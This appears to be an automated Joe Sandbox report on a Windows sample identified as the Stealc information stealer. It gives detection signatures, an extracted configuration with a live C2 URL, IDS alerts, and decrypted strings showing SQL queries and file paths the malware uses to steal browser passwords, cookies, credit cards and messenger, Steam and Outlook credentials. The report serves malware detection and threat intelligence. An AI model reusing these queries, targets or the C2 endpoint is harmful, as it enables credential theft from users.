Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1545720
MD5:e7e67024404f23389e4052996e08923a
SHA1:7b695a106607d413d657ba1ca50401b03df2fafd
SHA256:114e599411e6fa14e2231d45e8ad7ccfffcb068cebe1c93ee98094c8a744cecb
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 4600 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E7E67024404F23389E4052996E08923A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1800359502.0000000000FBE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.1756543501.0000000004E30000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 4600JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 4600JoeSecurity_StealcYara detected StealcJoe Security
              Click to see the 1 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.20000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-30T21:55:11.459817+010020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.20680TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Found malware configuration
                Source: 0.2.file.exe.20000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 0.2.file.exe.20000.0.unpackString decryptor: INSERT_KEY_HERE
                Source: 0.2.file.exe.20000.0.unpackString decryptor: 30
                Source: 0.2.file.exe.20000.0.unpackString decryptor: 11
                Source: 0.2.file.exe.20000.0.unpackString decryptor: 20
                Source: 0.2.file.exe.20000.0.unpackString decryptor: 24
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GetProcAddress
                Source: 0.2.file.exe.20000.0.unpackString decryptor: LoadLibraryA
                Source: 0.2.file.exe.20000.0.unpackString decryptor: lstrcatA
                Source: 0.2.file.exe.20000.0.unpackString decryptor: OpenEventA
                Source: 0.2.file.exe.20000.0.unpackString decryptor: CreateEventA
                Source: 0.2.file.exe.20000.0.unpackString decryptor: CloseHandle
                Source: 0.2.file.exe.20000.0.unpackString decryptor: Sleep
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GetUserDefaultLangID
                Source: 0.2.file.exe.20000.0.unpackString decryptor: VirtualAllocExNuma
                Source: 0.2.file.exe.20000.0.unpackString decryptor: VirtualFree
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GetSystemInfo
                Source: 0.2.file.exe.20000.0.unpackString decryptor: VirtualAlloc
                Source: 0.2.file.exe.20000.0.unpackString decryptor: HeapAlloc
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GetComputerNameA
                Source: 0.2.file.exe.20000.0.unpackString decryptor: lstrcpyA
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GetProcessHeap
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GetCurrentProcess
                Source: 0.2.file.exe.20000.0.unpackString decryptor: lstrlenA
                Source: 0.2.file.exe.20000.0.unpackString decryptor: ExitProcess
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GlobalMemoryStatusEx
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GetSystemTime
                Source: 0.2.file.exe.20000.0.unpackString decryptor: SystemTimeToFileTime
                Source: 0.2.file.exe.20000.0.unpackString decryptor: advapi32.dll
                Source: 0.2.file.exe.20000.0.unpackString decryptor: gdi32.dll
                Source: 0.2.file.exe.20000.0.unpackString decryptor: user32.dll
                Source: 0.2.file.exe.20000.0.unpackString decryptor: crypt32.dll
                Source: 0.2.file.exe.20000.0.unpackString decryptor: ntdll.dll
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GetUserNameA
                Source: 0.2.file.exe.20000.0.unpackString decryptor: CreateDCA
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GetDeviceCaps
                Source: 0.2.file.exe.20000.0.unpackString decryptor: ReleaseDC
                Source: 0.2.file.exe.20000.0.unpackString decryptor: CryptStringToBinaryA
                Source: 0.2.file.exe.20000.0.unpackString decryptor: sscanf
                Source: 0.2.file.exe.20000.0.unpackString decryptor: VMwareVMware
                Source: 0.2.file.exe.20000.0.unpackString decryptor: HAL9TH
                Source: 0.2.file.exe.20000.0.unpackString decryptor: JohnDoe
                Source: 0.2.file.exe.20000.0.unpackString decryptor: DISPLAY
                Source: 0.2.file.exe.20000.0.unpackString decryptor: %hu/%hu/%hu
                Source: 0.2.file.exe.20000.0.unpackString decryptor: http://185.215.113.206
                Source: 0.2.file.exe.20000.0.unpackString decryptor: bksvnsj
                Source: 0.2.file.exe.20000.0.unpackString decryptor: /6c4adf523b719729.php
                Source: 0.2.file.exe.20000.0.unpackString decryptor: /746f34465cf17784/
                Source: 0.2.file.exe.20000.0.unpackString decryptor: tale
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GetEnvironmentVariableA
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GetFileAttributesA
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GlobalLock
                Source: 0.2.file.exe.20000.0.unpackString decryptor: HeapFree
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GetFileSize
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GlobalSize
                Source: 0.2.file.exe.20000.0.unpackString decryptor: CreateToolhelp32Snapshot
                Source: 0.2.file.exe.20000.0.unpackString decryptor: IsWow64Process
                Source: 0.2.file.exe.20000.0.unpackString decryptor: Process32Next
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GetLocalTime
                Source: 0.2.file.exe.20000.0.unpackString decryptor: FreeLibrary
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GetTimeZoneInformation
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GetSystemPowerStatus
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GetVolumeInformationA
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GetWindowsDirectoryA
                Source: 0.2.file.exe.20000.0.unpackString decryptor: Process32First
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GetLocaleInfoA
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GetUserDefaultLocaleName
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GetModuleFileNameA
                Source: 0.2.file.exe.20000.0.unpackString decryptor: DeleteFileA
                Source: 0.2.file.exe.20000.0.unpackString decryptor: FindNextFileA
                Source: 0.2.file.exe.20000.0.unpackString decryptor: LocalFree
                Source: 0.2.file.exe.20000.0.unpackString decryptor: FindClose
                Source: 0.2.file.exe.20000.0.unpackString decryptor: SetEnvironmentVariableA
                Source: 0.2.file.exe.20000.0.unpackString decryptor: LocalAlloc
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GetFileSizeEx
                Source: 0.2.file.exe.20000.0.unpackString decryptor: ReadFile
                Source: 0.2.file.exe.20000.0.unpackString decryptor: SetFilePointer
                Source: 0.2.file.exe.20000.0.unpackString decryptor: WriteFile
                Source: 0.2.file.exe.20000.0.unpackString decryptor: CreateFileA
                Source: 0.2.file.exe.20000.0.unpackString decryptor: FindFirstFileA
                Source: 0.2.file.exe.20000.0.unpackString decryptor: CopyFileA
                Source: 0.2.file.exe.20000.0.unpackString decryptor: VirtualProtect
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GetLogicalProcessorInformationEx
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GetLastError
                Source: 0.2.file.exe.20000.0.unpackString decryptor: lstrcpynA
                Source: 0.2.file.exe.20000.0.unpackString decryptor: MultiByteToWideChar
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GlobalFree
                Source: 0.2.file.exe.20000.0.unpackString decryptor: WideCharToMultiByte
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GlobalAlloc
                Source: 0.2.file.exe.20000.0.unpackString decryptor: OpenProcess
                Source: 0.2.file.exe.20000.0.unpackString decryptor: TerminateProcess
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GetCurrentProcessId
                Source: 0.2.file.exe.20000.0.unpackString decryptor: gdiplus.dll
                Source: 0.2.file.exe.20000.0.unpackString decryptor: ole32.dll
                Source: 0.2.file.exe.20000.0.unpackString decryptor: bcrypt.dll
                Source: 0.2.file.exe.20000.0.unpackString decryptor: wininet.dll
                Source: 0.2.file.exe.20000.0.unpackString decryptor: shlwapi.dll
                Source: 0.2.file.exe.20000.0.unpackString decryptor: shell32.dll
                Source: 0.2.file.exe.20000.0.unpackString decryptor: psapi.dll
                Source: 0.2.file.exe.20000.0.unpackString decryptor: rstrtmgr.dll
                Source: 0.2.file.exe.20000.0.unpackString decryptor: CreateCompatibleBitmap
                Source: 0.2.file.exe.20000.0.unpackString decryptor: SelectObject
                Source: 0.2.file.exe.20000.0.unpackString decryptor: BitBlt
                Source: 0.2.file.exe.20000.0.unpackString decryptor: DeleteObject
                Source: 0.2.file.exe.20000.0.unpackString decryptor: CreateCompatibleDC
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GdipGetImageEncodersSize
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GdipGetImageEncoders
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GdipCreateBitmapFromHBITMAP
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GdiplusStartup
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GdiplusShutdown
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GdipSaveImageToStream
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GdipDisposeImage
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GdipFree
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GetHGlobalFromStream
                Source: 0.2.file.exe.20000.0.unpackString decryptor: CreateStreamOnHGlobal
                Source: 0.2.file.exe.20000.0.unpackString decryptor: CoUninitialize
                Source: 0.2.file.exe.20000.0.unpackString decryptor: CoInitialize
                Source: 0.2.file.exe.20000.0.unpackString decryptor: CoCreateInstance
                Source: 0.2.file.exe.20000.0.unpackString decryptor: BCryptGenerateSymmetricKey
                Source: 0.2.file.exe.20000.0.unpackString decryptor: BCryptCloseAlgorithmProvider
                Source: 0.2.file.exe.20000.0.unpackString decryptor: BCryptDecrypt
                Source: 0.2.file.exe.20000.0.unpackString decryptor: BCryptSetProperty
                Source: 0.2.file.exe.20000.0.unpackString decryptor: BCryptDestroyKey
                Source: 0.2.file.exe.20000.0.unpackString decryptor: BCryptOpenAlgorithmProvider
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GetWindowRect
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GetDesktopWindow
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GetDC
                Source: 0.2.file.exe.20000.0.unpackString decryptor: CloseWindow
                Source: 0.2.file.exe.20000.0.unpackString decryptor: wsprintfA
                Source: 0.2.file.exe.20000.0.unpackString decryptor: EnumDisplayDevicesA
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GetKeyboardLayoutList
                Source: 0.2.file.exe.20000.0.unpackString decryptor: CharToOemW
                Source: 0.2.file.exe.20000.0.unpackString decryptor: wsprintfW
                Source: 0.2.file.exe.20000.0.unpackString decryptor: RegQueryValueExA
                Source: 0.2.file.exe.20000.0.unpackString decryptor: RegEnumKeyExA
                Source: 0.2.file.exe.20000.0.unpackString decryptor: RegOpenKeyExA
                Source: 0.2.file.exe.20000.0.unpackString decryptor: RegCloseKey
                Source: 0.2.file.exe.20000.0.unpackString decryptor: RegEnumValueA
                Source: 0.2.file.exe.20000.0.unpackString decryptor: CryptBinaryToStringA
                Source: 0.2.file.exe.20000.0.unpackString decryptor: CryptUnprotectData
                Source: 0.2.file.exe.20000.0.unpackString decryptor: SHGetFolderPathA
                Source: 0.2.file.exe.20000.0.unpackString decryptor: ShellExecuteExA
                Source: 0.2.file.exe.20000.0.unpackString decryptor: InternetOpenUrlA
                Source: 0.2.file.exe.20000.0.unpackString decryptor: InternetConnectA
                Source: 0.2.file.exe.20000.0.unpackString decryptor: InternetCloseHandle
                Source: 0.2.file.exe.20000.0.unpackString decryptor: InternetOpenA
                Source: 0.2.file.exe.20000.0.unpackString decryptor: HttpSendRequestA
                Source: 0.2.file.exe.20000.0.unpackString decryptor: HttpOpenRequestA
                Source: 0.2.file.exe.20000.0.unpackString decryptor: InternetReadFile
                Source: 0.2.file.exe.20000.0.unpackString decryptor: InternetCrackUrlA
                Source: 0.2.file.exe.20000.0.unpackString decryptor: StrCmpCA
                Source: 0.2.file.exe.20000.0.unpackString decryptor: StrStrA
                Source: 0.2.file.exe.20000.0.unpackString decryptor: StrCmpCW
                Source: 0.2.file.exe.20000.0.unpackString decryptor: PathMatchSpecA
                Source: 0.2.file.exe.20000.0.unpackString decryptor: GetModuleFileNameExA
                Source: 0.2.file.exe.20000.0.unpackString decryptor: RmStartSession
                Source: 0.2.file.exe.20000.0.unpackString decryptor: RmRegisterResources
                Source: 0.2.file.exe.20000.0.unpackString decryptor: RmGetList
                Source: 0.2.file.exe.20000.0.unpackString decryptor: RmEndSession
                Source: 0.2.file.exe.20000.0.unpackString decryptor: sqlite3_open
                Source: 0.2.file.exe.20000.0.unpackString decryptor: sqlite3_prepare_v2
                Source: 0.2.file.exe.20000.0.unpackString decryptor: sqlite3_step
                Source: 0.2.file.exe.20000.0.unpackString decryptor: sqlite3_column_text
                Source: 0.2.file.exe.20000.0.unpackString decryptor: sqlite3_finalize
                Source: 0.2.file.exe.20000.0.unpackString decryptor: sqlite3_close
                Source: 0.2.file.exe.20000.0.unpackString decryptor: sqlite3_column_bytes
                Source: 0.2.file.exe.20000.0.unpackString decryptor: sqlite3_column_blob
                Source: 0.2.file.exe.20000.0.unpackString decryptor: encrypted_key
                Source: 0.2.file.exe.20000.0.unpackString decryptor: PATH
                Source: 0.2.file.exe.20000.0.unpackString decryptor: C:\ProgramData\nss3.dll
                Source: 0.2.file.exe.20000.0.unpackString decryptor: NSS_Init
                Source: 0.2.file.exe.20000.0.unpackString decryptor: NSS_Shutdown
                Source: 0.2.file.exe.20000.0.unpackString decryptor: PK11_GetInternalKeySlot
                Source: 0.2.file.exe.20000.0.unpackString decryptor: PK11_FreeSlot
                Source: 0.2.file.exe.20000.0.unpackString decryptor: PK11_Authenticate
                Source: 0.2.file.exe.20000.0.unpackString decryptor: PK11SDR_Decrypt
                Source: 0.2.file.exe.20000.0.unpackString decryptor: C:\ProgramData\
                Source: 0.2.file.exe.20000.0.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                Source: 0.2.file.exe.20000.0.unpackString decryptor: browser:
                Source: 0.2.file.exe.20000.0.unpackString decryptor: profile:
                Source: 0.2.file.exe.20000.0.unpackString decryptor: url:
                Source: 0.2.file.exe.20000.0.unpackString decryptor: login:
                Source: 0.2.file.exe.20000.0.unpackString decryptor: password:
                Source: 0.2.file.exe.20000.0.unpackString decryptor: Opera
                Source: 0.2.file.exe.20000.0.unpackString decryptor: OperaGX
                Source: 0.2.file.exe.20000.0.unpackString decryptor: Network
                Source: 0.2.file.exe.20000.0.unpackString decryptor: cookies
                Source: 0.2.file.exe.20000.0.unpackString decryptor: .txt
                Source: 0.2.file.exe.20000.0.unpackString decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
                Source: 0.2.file.exe.20000.0.unpackString decryptor: TRUE
                Source: 0.2.file.exe.20000.0.unpackString decryptor: FALSE
                Source: 0.2.file.exe.20000.0.unpackString decryptor: autofill
                Source: 0.2.file.exe.20000.0.unpackString decryptor: SELECT name, value FROM autofill
                Source: 0.2.file.exe.20000.0.unpackString decryptor: history
                Source: 0.2.file.exe.20000.0.unpackString decryptor: SELECT url FROM urls LIMIT 1000
                Source: 0.2.file.exe.20000.0.unpackString decryptor: cc
                Source: 0.2.file.exe.20000.0.unpackString decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                Source: 0.2.file.exe.20000.0.unpackString decryptor: name:
                Source: 0.2.file.exe.20000.0.unpackString decryptor: month:
                Source: 0.2.file.exe.20000.0.unpackString decryptor: year:
                Source: 0.2.file.exe.20000.0.unpackString decryptor: card:
                Source: 0.2.file.exe.20000.0.unpackString decryptor: Cookies
                Source: 0.2.file.exe.20000.0.unpackString decryptor: Login Data
                Source: 0.2.file.exe.20000.0.unpackString decryptor: Web Data
                Source: 0.2.file.exe.20000.0.unpackString decryptor: History
                Source: 0.2.file.exe.20000.0.unpackString decryptor: logins.json
                Source: 0.2.file.exe.20000.0.unpackString decryptor: formSubmitURL
                Source: 0.2.file.exe.20000.0.unpackString decryptor: usernameField
                Source: 0.2.file.exe.20000.0.unpackString decryptor: encryptedUsername
                Source: 0.2.file.exe.20000.0.unpackString decryptor: encryptedPassword
                Source: 0.2.file.exe.20000.0.unpackString decryptor: guid
                Source: 0.2.file.exe.20000.0.unpackString decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                Source: 0.2.file.exe.20000.0.unpackString decryptor: SELECT fieldname, value FROM moz_formhistory
                Source: 0.2.file.exe.20000.0.unpackString decryptor: SELECT url FROM moz_places LIMIT 1000
                Source: 0.2.file.exe.20000.0.unpackString decryptor: cookies.sqlite
                Source: 0.2.file.exe.20000.0.unpackString decryptor: formhistory.sqlite
                Source: 0.2.file.exe.20000.0.unpackString decryptor: places.sqlite
                Source: 0.2.file.exe.20000.0.unpackString decryptor: plugins
                Source: 0.2.file.exe.20000.0.unpackString decryptor: Local Extension Settings
                Source: 0.2.file.exe.20000.0.unpackString decryptor: Sync Extension Settings
                Source: 0.2.file.exe.20000.0.unpackString decryptor: IndexedDB
                Source: 0.2.file.exe.20000.0.unpackString decryptor: Opera Stable
                Source: 0.2.file.exe.20000.0.unpackString decryptor: Opera GX Stable
                Source: 0.2.file.exe.20000.0.unpackString decryptor: CURRENT
                Source: 0.2.file.exe.20000.0.unpackString decryptor: chrome-extension_
                Source: 0.2.file.exe.20000.0.unpackString decryptor: _0.indexeddb.leveldb
                Source: 0.2.file.exe.20000.0.unpackString decryptor: Local State
                Source: 0.2.file.exe.20000.0.unpackString decryptor: profiles.ini
                Source: 0.2.file.exe.20000.0.unpackString decryptor: chrome
                Source: 0.2.file.exe.20000.0.unpackString decryptor: opera
                Source: 0.2.file.exe.20000.0.unpackString decryptor: firefox
                Source: 0.2.file.exe.20000.0.unpackString decryptor: wallets
                Source: 0.2.file.exe.20000.0.unpackString decryptor: %08lX%04lX%lu
                Source: 0.2.file.exe.20000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                Source: 0.2.file.exe.20000.0.unpackString decryptor: ProductName
                Source: 0.2.file.exe.20000.0.unpackString decryptor: x32
                Source: 0.2.file.exe.20000.0.unpackString decryptor: x64
                Source: 0.2.file.exe.20000.0.unpackString decryptor: %d/%d/%d %d:%d:%d
                Source: 0.2.file.exe.20000.0.unpackString decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: 0.2.file.exe.20000.0.unpackString decryptor: ProcessorNameString
                Source: 0.2.file.exe.20000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                Source: 0.2.file.exe.20000.0.unpackString decryptor: DisplayName
                Source: 0.2.file.exe.20000.0.unpackString decryptor: DisplayVersion
                Source: 0.2.file.exe.20000.0.unpackString decryptor: Network Info:
                Source: 0.2.file.exe.20000.0.unpackString decryptor: - IP: IP?
                Source: 0.2.file.exe.20000.0.unpackString decryptor: - Country: ISO?
                Source: 0.2.file.exe.20000.0.unpackString decryptor: System Summary:
                Source: 0.2.file.exe.20000.0.unpackString decryptor: - HWID:
                Source: 0.2.file.exe.20000.0.unpackString decryptor: - OS:
                Source: 0.2.file.exe.20000.0.unpackString decryptor: - Architecture:
                Source: 0.2.file.exe.20000.0.unpackString decryptor: - UserName:
                Source: 0.2.file.exe.20000.0.unpackString decryptor: - Computer Name:
                Source: 0.2.file.exe.20000.0.unpackString decryptor: - Local Time:
                Source: 0.2.file.exe.20000.0.unpackString decryptor: - UTC:
                Source: 0.2.file.exe.20000.0.unpackString decryptor: - Language:
                Source: 0.2.file.exe.20000.0.unpackString decryptor: - Keyboards:
                Source: 0.2.file.exe.20000.0.unpackString decryptor: - Laptop:
                Source: 0.2.file.exe.20000.0.unpackString decryptor: - Running Path:
                Source: 0.2.file.exe.20000.0.unpackString decryptor: - CPU:
                Source: 0.2.file.exe.20000.0.unpackString decryptor: - Threads:
                Source: 0.2.file.exe.20000.0.unpackString decryptor: - Cores:
                Source: 0.2.file.exe.20000.0.unpackString decryptor: - RAM:
                Source: 0.2.file.exe.20000.0.unpackString decryptor: - Display Resolution:
                Source: 0.2.file.exe.20000.0.unpackString decryptor: - GPU:
                Source: 0.2.file.exe.20000.0.unpackString decryptor: User Agents:
                Source: 0.2.file.exe.20000.0.unpackString decryptor: Installed Apps:
                Source: 0.2.file.exe.20000.0.unpackString decryptor: All Users:
                Source: 0.2.file.exe.20000.0.unpackString decryptor: Current User:
                Source: 0.2.file.exe.20000.0.unpackString decryptor: Process List:
                Source: 0.2.file.exe.20000.0.unpackString decryptor: system_info.txt
                Source: 0.2.file.exe.20000.0.unpackString decryptor: freebl3.dll
                Source: 0.2.file.exe.20000.0.unpackString decryptor: mozglue.dll
                Source: 0.2.file.exe.20000.0.unpackString decryptor: msvcp140.dll
                Source: 0.2.file.exe.20000.0.unpackString decryptor: nss3.dll
                Source: 0.2.file.exe.20000.0.unpackString decryptor: softokn3.dll
                Source: 0.2.file.exe.20000.0.unpackString decryptor: vcruntime140.dll
                Source: 0.2.file.exe.20000.0.unpackString decryptor: \Temp\
                Source: 0.2.file.exe.20000.0.unpackString decryptor: .exe
                Source: 0.2.file.exe.20000.0.unpackString decryptor: runas
                Source: 0.2.file.exe.20000.0.unpackString decryptor: open
                Source: 0.2.file.exe.20000.0.unpackString decryptor: /c start
                Source: 0.2.file.exe.20000.0.unpackString decryptor: %DESKTOP%
                Source: 0.2.file.exe.20000.0.unpackString decryptor: %APPDATA%
                Source: 0.2.file.exe.20000.0.unpackString decryptor: %LOCALAPPDATA%
                Source: 0.2.file.exe.20000.0.unpackString decryptor: %USERPROFILE%
                Source: 0.2.file.exe.20000.0.unpackString decryptor: %DOCUMENTS%
                Source: 0.2.file.exe.20000.0.unpackString decryptor: %PROGRAMFILES%
                Source: 0.2.file.exe.20000.0.unpackString decryptor: %PROGRAMFILES_86%
                Source: 0.2.file.exe.20000.0.unpackString decryptor: %RECENT%
                Source: 0.2.file.exe.20000.0.unpackString decryptor: *.lnk
                Source: 0.2.file.exe.20000.0.unpackString decryptor: files
                Source: 0.2.file.exe.20000.0.unpackString decryptor: \discord\
                Source: 0.2.file.exe.20000.0.unpackString decryptor: \Local Storage\leveldb\CURRENT
                Source: 0.2.file.exe.20000.0.unpackString decryptor: \Local Storage\leveldb
                Source: 0.2.file.exe.20000.0.unpackString decryptor: \Telegram Desktop\
                Source: 0.2.file.exe.20000.0.unpackString decryptor: key_datas
                Source: 0.2.file.exe.20000.0.unpackString decryptor: D877F783D5D3EF8C*
                Source: 0.2.file.exe.20000.0.unpackString decryptor: map*
                Source: 0.2.file.exe.20000.0.unpackString decryptor: A7FDF864FBC10B77*
                Source: 0.2.file.exe.20000.0.unpackString decryptor: A92DAA6EA6F891F2*
                Source: 0.2.file.exe.20000.0.unpackString decryptor: F8806DD0C461824F*
                Source: 0.2.file.exe.20000.0.unpackString decryptor: Telegram
                Source: 0.2.file.exe.20000.0.unpackString decryptor: Tox
                Source: 0.2.file.exe.20000.0.unpackString decryptor: *.tox
                Source: 0.2.file.exe.20000.0.unpackString decryptor: *.ini
                Source: 0.2.file.exe.20000.0.unpackString decryptor: Password
                Source: 0.2.file.exe.20000.0.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.20000.0.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.20000.0.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.20000.0.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.20000.0.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.20000.0.unpackString decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.20000.0.unpackString decryptor: 00000001
                Source: 0.2.file.exe.20000.0.unpackString decryptor: 00000002
                Source: 0.2.file.exe.20000.0.unpackString decryptor: 00000003
                Source: 0.2.file.exe.20000.0.unpackString decryptor: 00000004
                Source: 0.2.file.exe.20000.0.unpackString decryptor: \Outlook\accounts.txt
                Source: 0.2.file.exe.20000.0.unpackString decryptor: Pidgin
                Source: 0.2.file.exe.20000.0.unpackString decryptor: \.purple\
                Source: 0.2.file.exe.20000.0.unpackString decryptor: accounts.xml
                Source: 0.2.file.exe.20000.0.unpackString decryptor: dQw4w9WgXcQ
                Source: 0.2.file.exe.20000.0.unpackString decryptor: token:
                Source: 0.2.file.exe.20000.0.unpackString decryptor: Software\Valve\Steam
                Source: 0.2.file.exe.20000.0.unpackString decryptor: SteamPath
                Source: 0.2.file.exe.20000.0.unpackString decryptor: \config\
                Source: 0.2.file.exe.20000.0.unpackString decryptor: ssfn*
                Source: 0.2.file.exe.20000.0.unpackString decryptor: config.vdf
                Source: 0.2.file.exe.20000.0.unpackString decryptor: DialogConfig.vdf
                Source: 0.2.file.exe.20000.0.unpackString decryptor: DialogConfigOverlay*.vdf
                Source: 0.2.file.exe.20000.0.unpackString decryptor: libraryfolders.vdf
                Source: 0.2.file.exe.20000.0.unpackString decryptor: loginusers.vdf
                Source: 0.2.file.exe.20000.0.unpackString decryptor: \Steam\
                Source: 0.2.file.exe.20000.0.unpackString decryptor: sqlite3.dll
                Source: 0.2.file.exe.20000.0.unpackString decryptor: browsers
                Source: 0.2.file.exe.20000.0.unpackString decryptor: done
